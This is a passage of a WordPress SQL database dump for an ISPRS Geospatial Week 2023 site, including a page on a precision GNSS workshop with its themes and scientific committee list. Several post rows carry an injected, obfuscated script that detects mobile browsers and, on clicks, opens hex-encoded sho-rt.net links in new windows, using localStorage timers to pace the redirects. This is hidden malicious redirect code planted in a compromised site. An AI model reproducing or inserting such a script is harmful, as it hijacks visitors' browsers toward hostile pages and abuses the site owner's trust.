ction(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-12-16 14:21:44','2022-12-16 14:21:44','',2659,'https://gsw2023.com/?p=3492',0,'revision','',0),
(3493,1,'2022-12-16 14:22:47','2022-12-16 14:22:47','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60, 61, 63, 64\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-12-16 14:22:47','2022-12-16 14:22:47','',2876,'https://gsw2023.com/?p=3493',0,'revision','',0),
(3494,1,'2022-12-16 14:30:04','2022-12-16 14:30:04','','w26m4','','inherit','open','closed','','w26m4','','','2022-12-16 14:30:04','2022-12-16 14:30:04','',3452,'https://gsw2023.com/wp-content/uploads/2022/12/w26m4.jpg',0,'attachment','image/jpeg',0),
(3495,1,'2022-12-16 14:30:18','2022-12-16 14:30:18','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"color: cyan;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<p>&nbsp;</p>\n<h5 style=\"color: cyan;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][vc_single_image image=\"3494\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){r